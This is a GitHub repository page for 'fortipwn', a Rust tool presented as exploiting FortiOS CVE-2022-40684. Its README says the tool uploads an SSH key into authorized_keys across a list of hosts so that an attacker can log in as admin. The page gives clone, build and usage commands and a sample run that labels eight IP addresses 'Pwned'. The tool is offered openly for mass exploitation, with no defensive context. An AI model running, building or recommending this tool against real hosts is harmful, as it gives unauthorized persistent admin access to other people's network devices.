Skip to content
/ fortipwn Public

Forti CVE-2022-40684 enumeration script built in Rust

3 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Grapphy/fortipwn

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits

src

src

 
 

tests

tests

 
 

.gitignore

.gitignore

 
 

Cargo.lock

Cargo.lock

 
 

Cargo.toml

Cargo.toml

 
 

README.md

README.md

 
 

Repository files navigation

fortipwn

Forti CVE-2022-40684 enumeration script built in Rust.

Uploads an SSH public key into authorized_keys, allowing an attacker to SSH into a server running FortiOS as admin.

Usage

$ ./fortipwn <hosts.txt> <id_rsa.pub>

Build

$ git clone https://github.com/Grapphy/fortipwn/
$ cd fortipwn
$ cargo build --release
$ cd target/release/
$ ./fortipwn <host.txt> <id_rsa.pub>

Output

$ ./fortipwn examples_ip.txt id_rsa.pub
Checking for 150 hosts. You might log-in through ssh as admin@host on pwned hosts.
Pwned: 210.29.110.143
Pwned: 144.14.71.122
Pwned: 21.220.10.82
Pwned: 163.123.102.32
Pwned: 121.159.192.10
Pwned: 162.49.194.19
Pwned: 185.92.20.40
Pwned: 194.19.211.19
Finished scanning

About

Forti CVE-2022-40684 enumeration script built in Rust

Resources

Readme
Activity

Stars

3 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages